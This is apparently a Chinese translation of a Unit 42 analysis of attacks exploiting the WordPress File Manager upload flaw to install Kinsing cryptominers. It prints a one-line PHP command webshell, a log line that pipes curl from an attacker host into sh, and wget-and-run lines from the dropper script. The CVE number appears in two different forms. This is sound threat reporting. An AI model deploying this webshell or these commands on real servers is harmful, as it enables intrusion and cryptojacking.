[[381498]]

 2020年12月，Unit 42研究人員發(fā)現(xiàn)有攻擊者嘗試?yán)肳ordPress File Manager(文件管理器)插件中的文件上傳漏洞。攻擊者成功利用該漏洞可以以任意文件名和擴展上傳任意文件，引發(fā)目標(biāo)web 服務(wù)器上的遠(yuǎn)程代碼執(zhí)行。

攻擊者利用該漏洞利用來安裝webshell，然后該webshell 被用來安裝Kinsing惡意軟件，該惡意軟件會從H2miner 家族運行惡意加密貨幣挖礦機。Kinsing是用Golang編程語言開發(fā)的，最終的目標(biāo)是用于容器環(huán)境中的加密貨幣劫持攻擊。

CVE-2020-2513和Webshells

CVE-2020-2513漏洞產(chǎn)生的原因是WordPress文件管理器插件將elFinder庫的connector.minimal.php.dist 文件擴展名改成了.php，所以該文件可以直接執(zhí)行。但是因為該文件沒有訪問限制，因此任何瀏覽該web 服務(wù)器的用戶都可以執(zhí)行。該文件包含無需認(rèn)證就上傳文件到web服務(wù)器的機制。由于該漏洞，任何人都可以上傳文件，因此惡意攻擊者就利用該機制來上傳webshell，可以用來進(jìn)行下一步的惡意軟件安裝或加密貨幣挖礦活動。

攻擊鏈

研究人員調(diào)查發(fā)現(xiàn)被攻擊的機器中有以下日志信息，其中發(fā)給Web服務(wù)器的HTTP POST請求有：

[19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36” 

該請求用來上傳webshell。研究人員進(jìn)一步分析發(fā)現(xiàn)了惡意webshell：

[19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411 

從上圖中可以發(fā)現(xiàn)，該webshell名為k.php，并提供了一個執(zhí)行的命令。該webshell 本身非常簡單，是在web 服務(wù)器上明文保存的，并且不含有任何的混淆和認(rèn)證措施：

< ?php if(isset($_REQUEST['cmd']){ echo "< pre >"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "< /pre >"; die; }? > 

研究人員進(jìn)一步分析返回給webshell k.php的HTTP GET請求，發(fā)現(xiàn)該命令調(diào)用了下載名為wpf.sh文件的curl 命令，并執(zhí)行該文件。

研究人員從攻擊者的C2 服務(wù)器中獲得了該shell腳本，文件內(nèi)容如下：

$WGET $DIR/kinsing http://X.X.X.X/kinsing 
chmod +x $DIR/kinsing 
… 
SKL=wpf $DIR/kinsing 
… 

 wpf.sh文件是一個使用wget下載Kinsing的腳本，給予該腳本執(zhí)行權(quán)限，并執(zhí)行。

總結(jié)

研究人員發(fā)現(xiàn)了WordPress 文件管理器遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2020-25213 的在野利用。攻擊者利用該漏洞利用來安裝Kinsing惡意軟件，運行一個H2miner家族的惡意加密貨幣挖礦機。Kinsing的最終目標(biāo)是用于容器環(huán)境的加密貨幣劫持攻擊。

本文翻譯自：https://unit42.paloaltonetworks.com/cve-2020-25213/如若轉(zhuǎn)載，請注明原文地址。